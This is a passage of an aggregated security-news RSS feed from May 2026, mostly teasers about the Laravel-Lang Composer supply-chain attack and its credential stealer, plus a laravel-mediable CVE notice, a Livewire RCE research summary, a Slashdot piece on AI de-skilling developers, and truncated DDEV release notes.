<title><![CDATA[Supply-Chain-Angriff auf Laravel-Lang: Credential Stealer über kompromittierte PHP-Packages]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Neue Hinweise zu einem kompromittierten Laravel-Lang-Ökosystem zeigen, wie Angreifer über manipulierte Composer-Tags einen automatisierten Credential-Stealer ausrollen. Betroffen sind zahlreiche Paketversionen, wobei ein eingebetteter Helfer-Code bei jeder PHP-Anfrage im Au...]]></description>
<link>https://tsecurity.de/de/3544168/it-security-nachrichten/supply-chain-angriff-auf-laravel-lang-credential-stealer-ueber-kompromittierte-php-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544168/it-security-nachrichten/supply-chain-angriff-auf-laravel-lang-credential-stealer-ueber-kompromittierte-php-packages/</guid>
<pubDate>Sun, 24 May 2026 21:51:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-supply-chain-laravel-credential-stealer-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Neue Hinweise zu einem kompromittierten Laravel-Lang-Ökosystem zeigen, wie Angreifer über manipulierte Composer-Tags einen automatisierten Credential-Stealer ausrollen. Betroffen sind zahlreiche Paketversionen, wobei ein eingebetteter Helfer-Code bei jeder PHP-Anfrage im Autoload-Kontext startet. Der Angriffsablauf zielt auf Token und Secrets in Cloud-, CI/CD- und Browser-Umgebungen und exfiltriert die Daten an einen externen Server. Für […]</p>
<div><a href="https://www.it-boltwise.de/supply-chain-angriff-auf-laravel-lang-credential-stealer-ueber-kompromittierte-php-packages.html">... den vollständigen Artikel <strong>»Supply-Chain-Angriff auf Laravel-Lang: Credential Stealer über kompromittierte PHP-Packages«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/supply-chain-angriff-auf-laravel-lang-credential-stealer-ueber-kompromittierte-php-packages.html">Supply-Chain-Angriff auf Laravel-Lang: Credential Stealer über kompromittierte PHP-Packages</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Supply-Chain-Angriff in Laravel-Lang: 233 Backdoor-Versionen kompromittiert]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine Supply-Chain-Attacke hat im Laravel-Lang-Ökosystem offenbar 233 Paketversionen mit Backdoors versehen, verteilt über mehr als 700 GitHub-Repositories. Angreifer nutzten dabei GitHub-Tags in Kombination mit Composer, um Malware beim Laden lokalisierter Pakete automatisc...]]></description>
<link>https://tsecurity.de/de/3544081/it-security-nachrichten/supply-chain-angriff-in-laravel-lang-233-backdoor-versionen-kompromittiert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544081/it-security-nachrichten/supply-chain-angriff-in-laravel-lang-233-backdoor-versionen-kompromittiert/</guid>
<pubDate>Sun, 24 May 2026 20:37:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-supplychain-backdoor-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine Supply-Chain-Attacke hat im Laravel-Lang-Ökosystem offenbar 233 Paketversionen mit Backdoors versehen, verteilt über mehr als 700 GitHub-Repositories. Angreifer nutzten dabei GitHub-Tags in Kombination mit Composer, um Malware beim Laden lokalisierter Pakete automatisch auszuführen. Betroffen sind vor allem Entwicklerumgebungen, in denen Container, CI/CD-Workflows und geclusterte Secrets eine schnelle Ausbreitung ermöglichen. Für Teams […]</p>
<div><a href="https://www.it-boltwise.de/supply-chain-angriff-in-laravel-lang-233-backdoor-versionen-kompromittiert.html">... den vollständigen Artikel <strong>»Supply-Chain-Angriff in Laravel-Lang: 233 Backdoor-Versionen kompromittiert«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/supply-chain-angriff-in-laravel-lang-233-backdoor-versionen-kompromittiert.html">Supply-Chain-Angriff in Laravel-Lang: 233 Backdoor-Versionen kompromittiert</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Angriff auf Laravel-Lang-PHP-Packages: Credential Stealer über kompromittierte Composer-Tags]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor einer neuen Supply-Chain-Kampagne, die mehrere PHP-Packages aus dem Laravel-Lang-Umfeld als Einstieg nutzt. Angreifer sollen tausende neu veröffentlichte Paket-Tags manipuliert haben, sodass schädlicher Code bei jeder Anfrage automati...]]></description>
<link>https://tsecurity.de/de/3543954/it-security-nachrichten/angriff-auf-laravel-lang-php-packages-credential-stealer-ueber-kompromittierte-composer-tags/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3543954/it-security-nachrichten/angriff-auf-laravel-lang-php-packages-credential-stealer-ueber-kompromittierte-composer-tags/</guid>
<pubDate>Sun, 24 May 2026 19:25:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-laravel-lang-composer-credential-stealer-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor einer neuen Supply-Chain-Kampagne, die mehrere PHP-Packages aus dem Laravel-Lang-Umfeld als Einstieg nutzt. Angreifer sollen tausende neu veröffentlichte Paket-Tags manipuliert haben, sodass schädlicher Code bei jeder Anfrage automatisch ausgeführt wird. Der Stealer sammelt umfangreiche Identitäts- und Zugangsdaten aus Cloud-, CI/CD- und Entwicklerumgebungen und exfiltriert sie an einen […]</p>
<div><a href="https://www.it-boltwise.de/angriff-auf-laravel-lang-php-packages-credential-stealer-ueber-kompromittierte-composer-tags.html">... den vollständigen Artikel <strong>»Angriff auf Laravel-Lang-PHP-Packages: Credential Stealer über kompromittierte Composer-Tags«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/angriff-auf-laravel-lang-php-packages-credential-stealer-ueber-kompromittierte-composer-tags.html">Angriff auf Laravel-Lang-PHP-Packages: Credential Stealer über kompromittierte Composer-Tags</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Frühlingsoffensive der Hacker: Softwareentwicklung im Visier - Ad-hoc-news.de]]></title>
<description><![CDATA[Eine koordinierte Angriffswelle trifft Softwareentwickler: Über 700 infizierte Laravel-Pakete und tausende kompromittierte GitHub-Repositories ...]]></description>
<link>https://tsecurity.de/de/3543240/hacking/fruehlingsoffensive-der-hacker-softwareentwicklung-im-visier-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3543240/hacking/fruehlingsoffensive-der-hacker-softwareentwicklung-im-visier-ad-hoc-newsde/</guid>
<pubDate>Sun, 24 May 2026 10:22:17 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine koordinierte Angriffswelle trifft Softwareentwickler: Über 700 infizierte Laravel-Pakete und tausende kompromittierte GitHub-Repositories ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel Lang packages hijacked to deploy credential-stealing malware]]></title>
<description><![CDATA[A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages. [...]]]></description>
<link>https://tsecurity.de/de/3542593/it-security-nachrichten/laravel-lang-packages-hijacked-to-deploy-credential-stealing-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542593/it-security-nachrichten/laravel-lang-packages-hijacked-to-deploy-credential-stealing-malware/</guid>
<pubDate>Sat, 23 May 2026 22:52:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat Actor Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos]]></title>
<description><![CDATA[A sophisticated software supply chain attack has successfully compromised the Laravel-Lang ecosystem, impacting hundreds of package versions and exposing developers to severe credential theft. On May 22, 2026, security researchers from Aikido Security and Socket disclosed an active campaign that ...]]></description>
<link>https://tsecurity.de/de/3541994/it-security-nachrichten/threat-actor-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541994/it-security-nachrichten/threat-actor-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/</guid>
<pubDate>Sat, 23 May 2026 15:23:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated software supply chain attack has successfully compromised the Laravel-Lang ecosystem, impacting hundreds of package versions and exposing developers to severe credential theft. On May 22, 2026, security researchers from Aikido Security and Socket disclosed an active campaign that exploited GitHub’s version-tagging system to inject remote code execution (RCE) backdoors into widely used third-party […]</p>
<p>The post <a href="https://cyberpress.org/laravel-lang-packages-compromised/">Threat Actor Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel-Lang PHP Packages Compromised to Deliver Cross-Platform Credential Stealer]]></title>
<description><![CDATA[Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to Laravel-Lang to deliver a comprehensive credential-stealing framework. The affected packages include – laravel-lang/lang laravel-lang/http-statuses laravel-lan...]]></description>
<link>https://tsecurity.de/de/3541757/it-security-nachrichten/laravel-lang-php-packages-compromised-to-deliver-cross-platform-credential-stealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541757/it-security-nachrichten/laravel-lang-php-packages-compromised-to-deliver-cross-platform-credential-stealer/</guid>
<pubDate>Sat, 23 May 2026 12:37:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to Laravel-Lang to deliver a comprehensive credential-stealing framework. The affected packages include – laravel-lang/lang laravel-lang/http-statuses laravel-lang/attributes laravel-lang/actions “The timing and pattern of…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/laravel-lang-php-packages-compromised-to-deliver-cross-platform-credential-stealer/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/laravel-lang-php-packages-compromised-to-deliver-cross-platform-credential-stealer/">Laravel-Lang PHP Packages Compromised to Deliver Cross-Platform Credential Stealer</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel-Lang PHP Packages Compromised to Deliver Cross-Platform Credential Stealer]]></title>
<description><![CDATA[Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to  Laravel-Lang to deliver a comprehensive credential-stealing framework.

The affected packages include -


  laravel-lang/lang
  laravel-lang/http-statuses
  l...]]></description>
<link>https://tsecurity.de/de/3541739/it-security-nachrichten/laravel-lang-php-packages-compromised-to-deliver-cross-platform-credential-stealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541739/it-security-nachrichten/laravel-lang-php-packages-compromised-to-deliver-cross-platform-credential-stealer/</guid>
<pubDate>Sat, 23 May 2026 12:21:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to  Laravel-Lang to deliver a comprehensive credential-stealing framework.

The affected packages include -


  laravel-lang/lang
  laravel-lang/http-statuses
  laravel-lang/attributes
  laravel-lang/actions

"The timing and pattern of the newly published tags]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Compromise Laravel-Lang Packages via 700 GitHub Repos]]></title>
<description><![CDATA[A sophisticated and active supply chain attack has struck the Laravel-Lang open-source organization, compromising over 700 historical package versions across four widely used PHP localization repositories. The attack, detected on May 22, 2026, and reported by both Aikido Security and the Socket R...]]></description>
<link>https://tsecurity.de/de/3541514/it-security-nachrichten/hackers-compromise-laravel-lang-packages-via-700-github-repos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541514/it-security-nachrichten/hackers-compromise-laravel-lang-packages-via-700-github-repos/</guid>
<pubDate>Sat, 23 May 2026 09:52:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated and active supply chain attack has struck the Laravel-Lang open-source organization, compromising over 700 historical package versions across four widely used PHP localization repositories. The attack, detected on May 22, 2026, and reported by both Aikido Security and the Socket Research Team, introduces a fully functional remote code execution (RCE) backdoor that executes automatically via Composer’s […]</p>
<p>The post <a href="https://gbhackers.com/compromise-laravel-lang-packages/">Hackers Compromise Laravel-Lang Packages via 700 GitHub Repos</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Compromise Laravel-Lang Packages via 700 GitHub Repos]]></title>
<description><![CDATA[A sophisticated and active supply chain attack has struck the Laravel-Lang open-source organization, compromising over 700 historical package versions across four widely used PHP localization repositories. The attack, detected on May 22, 2026, and reported by both Aikido Security and the Socket R...]]></description>
<link>https://tsecurity.de/de/3541485/it-security-nachrichten/hackers-compromise-laravel-lang-packages-via-700-github-repos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541485/it-security-nachrichten/hackers-compromise-laravel-lang-packages-via-700-github-repos/</guid>
<pubDate>Sat, 23 May 2026 09:34:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A sophisticated and active supply chain attack has struck the Laravel-Lang open-source organization, compromising over 700 historical package versions across four widely used PHP localization repositories. The attack, detected on May 22, 2026, and reported by both Aikido Security and the Socket Research…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-compromise-laravel-lang-packages-via-700-github-repos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-compromise-laravel-lang-packages-via-700-github-repos/">Hackers Compromise Laravel-Lang Packages via 700 GitHub Repos</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-05-23 09h : 2 posts]]></title>
<description><![CDATA[2 posts were published in the last hour 6:32 : Foul play: Fake FIFA websites target soccer fans looking for World Cup tickets, merchandise 6:32 : Hackers Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos
Read more →
The post IT Security News Hourly Summary 2026-05-23 0...]]></description>
<link>https://tsecurity.de/de/3541447/it-security-nachrichten/it-security-news-hourly-summary-2026-05-23-09h-2-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541447/it-security-nachrichten/it-security-news-hourly-summary-2026-05-23-09h-2-posts/</guid>
<pubDate>Sat, 23 May 2026 09:07:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>2 posts were published in the last hour 6:32 : Foul play: Fake FIFA websites target soccer fans looking for World Cup tickets, merchandise 6:32 : Hackers Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-23-09h-2-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-23-09h-2-posts/">IT Security News Hourly Summary 2026-05-23 09h : 2 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos]]></title>
<description><![CDATA[A highly sophisticated supply chain attack has compromised the Laravel-Lang ecosystem, injecting credential-stealing remote code execution backdoors into 233 package versions across 700 GitHub repositories. Discovered in May 2026 by Socket and Aikido, threat actors manipulated GitHub tags to dist...]]></description>
<link>https://tsecurity.de/de/3541403/it-security-nachrichten/hackers-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541403/it-security-nachrichten/hackers-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/</guid>
<pubDate>Sat, 23 May 2026 08:34:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A highly sophisticated supply chain attack has compromised the Laravel-Lang ecosystem, injecting credential-stealing remote code execution backdoors into 233 package versions across 700 GitHub repositories. Discovered in May 2026 by Socket and Aikido, threat actors manipulated GitHub tags to distribute…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/">Hackers Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos]]></title>
<description><![CDATA[A highly sophisticated supply chain attack has compromised the Laravel-Lang ecosystem, injecting credential-stealing remote code execution backdoors into 233 package versions across 700 GitHub repositories. Discovered in May 2026 by Socket and Aikido, threat actors manipulated GitHub tags to dist...]]></description>
<link>https://tsecurity.de/de/3541306/it-security-nachrichten/hackers-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541306/it-security-nachrichten/hackers-compromised-233-versions-of-laravel-lang-packages-by-hacking-700-github-repos/</guid>
<pubDate>Sat, 23 May 2026 07:36:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A highly sophisticated supply chain attack has compromised the Laravel-Lang ecosystem, injecting credential-stealing remote code execution backdoors into 233 package versions across 700 GitHub repositories. Discovered in May 2026 by Socket and Aikido, threat actors manipulated GitHub tags to distribute malware through Composer’s autoloader, granting complete remote access to developer environments. The attackers bypassed direct […]</p>
<p>The post <a href="https://cybersecuritynews.com/laravel-lang-packages-compromised/">Hackers Compromised 233 Versions of Laravel-Lang Packages by Hacking 700 GitHub Repos</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-4809 | plank laravel-mediable up to 6.4.0 unrestricted upload]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in plank laravel-mediable up to 6.4.0. Affected is an unknown function. Executing a manipulation can lead to unrestricted upload.

This vulnerability is tracked as CVE-2026-4809. The attack can be launched remotely. No exploit exists.

...]]></description>
<link>https://tsecurity.de/de/3531216/sicherheitsluecken/cve-2026-4809-plank-laravel-mediable-up-to-640-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531216/sicherheitsluecken/cve-2026-4809-plank-laravel-mediable-up-to-640-unrestricted-upload/</guid>
<pubDate>Wed, 20 May 2026 02:50:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/plank:laravel-mediable">plank laravel-mediable up to 6.4.0</a>. Affected is an unknown function. Executing a manipulation can lead to unrestricted upload.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-4809">CVE-2026-4809</a>. The attack can be launched remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Software Developers Say AI Is Rotting Their Brains]]></title>
<description><![CDATA[An anonymous reader quotes a report from 404 Media: On Reddit, Hacker News and other places where people in software development talk to each other, more and more people are becoming disillusioned with the promise of code generated by large language models. Developers talk not just about how the ...]]></description>
<link>https://tsecurity.de/de/3515017/it-security-nachrichten/software-developers-say-ai-is-rotting-their-brains/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515017/it-security-nachrichten/software-developers-say-ai-is-rotting-their-brains/</guid>
<pubDate>Wed, 13 May 2026 23:08:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from 404 Media: On Reddit, Hacker News and other places where people in software development talk to each other, more and more people are becoming disillusioned with the promise of code generated by large language models. Developers talk not just about how the AI output is often flawed, but that using AI to get the job done is often a more time consuming, harder, and more frustrating experience because they have to go through the output and fix its mistakes. More concerning, developers who use AI at work report that they feel like they are de-skilling themselves and losing their ability to do their jobs as well as they used to.
 
"We're being told to use [AI] agents for broad changes across our codebase. There's no way to evaluate whether that much code is well-written or secure -- especially when hundreds of other programmers in the company are doing the same," a UX designer at a midsized tech company told me. 404 Media granted all the developers we talked to for this story anonymity because they signed non-disclosure agreements or because they fear retribution from their employers. "We're building a rat's nest of tech debt that will be impossible to untangle when these models become prohibitively expensive (any minute now...)." "I had some issues where I forgot how to implement a Laravel API and it scared the shit out of me. I went to university for this, I've been a software engineer for many years now and it feels like I am back before I ever wrote a single line of code," the software developer at a small web design firm told 404 Media. "It's making me dumber for sure," the fintech software developer added.
 
"It's like when we got cellphones and stopped remembering phone numbers, but it's grown to me mentally outsourcing 'thinking' in general. I feel my critical thinking and ability to sit and reason about a problem or a design has degraded because the all-knowing-dalai-llama is just a question away from giving me his take. And supposedly I tell myself ill just use it for inspiration but it ends up being my only thought. It gives you the illusion of productivity and expertise but at the end of the day you are more divorced from the output you submit than before."
 
A software engineer at the FAANG said: "When I was using it for code generation, I found myself having a lot of trouble building and maintaining a mental model of the code I was working with. Another aspect is that I joined late last year and [the company's] codebase is massive. As a new hire, part of my job is to learn how to navigate the codebase and use the established conventions, but I think the AI push really hampered my ability to do that."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Software+Developers+Say+AI+Is+Rotting+Their+Brains%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F05%2F13%2F1949225%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F05%2F13%2F1949225%2Fsoftware-developers-say-ai-is-rotting-their-brains%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/05/13/1949225/software-developers-say-ai-is-rotting-their-brains?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Livewire: remote command execution through unmarshaling]]></title>
<description><![CDATA[Livewire revolutionizes Laravel development by enabling real-time, interactive web interfaces using only PHP and Blade, removing the need of heavy JavaScript frameworks. Its innovative hydration system seamlessly instantiate and restores component states, supporting complex data types.

However, ...]]></description>
<link>https://tsecurity.de/de/3501332/it-security-nachrichten/livewire-remote-command-execution-through-unmarshaling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501332/it-security-nachrichten/livewire-remote-command-execution-through-unmarshaling/</guid>
<pubDate>Fri, 08 May 2026 23:17:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Livewire revolutionizes Laravel development by enabling real-time, interactive web interfaces using only PHP and Blade, removing the need of heavy JavaScript frameworks. Its innovative hydration system seamlessly instantiate and restores component states, supporting complex data types.

However, this mechanism comes with a critical vulnerability: a dangerous unmarshalling process can be exploited as long as an attacker is in possession of the APP_KEY of the application. By crafting malicious payloads, attackers can manipulate Livewire’s hydration process to execute arbitrary code, from simple function calls to stealthy remote command execution.

Finally, our research uncovered a pre-authenticated remote code execution vulnerability in Livewire, exploitable even without knowledge of the application’s APP_KEY. By analyzing Livewire’s recursive hydration mechanism, we found that attackers could inject malicious synthesizers through the updates field in Livewire requests, leveraging PHP’s loose typing and nested array handling. This technique bypasses checksum validation, allowing arbitrary object instantiation and leading to full system compromise.]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.4: XHGui for XHProf Profiling]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux or WSL2: Use apt install ddev or apt upgrade ddev see apt/yum installation
Traditional Windows: Use choco upgrade -y ddev, or download the ddev_windows_i...]]></description>
<link>https://tsecurity.de/de/3497304/downloads/v1244-xhgui-for-xhprof-profiling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497304/downloads/v1244-xhgui-for-xhprof-profiling/</guid>
<pubDate>Thu, 07 May 2026 22:17:30 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux or WSL2: Use <code>apt install ddev</code> or <code>apt upgrade ddev</code> see <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Traditional Windows: Use <code>choco upgrade -y ddev</code>, or download the ddev_windows_installer below.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights:</h2>
<ul>
<li><a href="https://typo3.org/article/four-ideas-to-be-funded-in-quarter-1-2025" rel="nofollow">Sponsored by the TYPO3 Community</a>: Integrate XHGui into DDEV, enable it with <code>ddev poweroff &amp;&amp; ddev config global --xhprof-mode=xhgui</code>, then use <code>ddev xhgui</code> in any of your projects.</li>
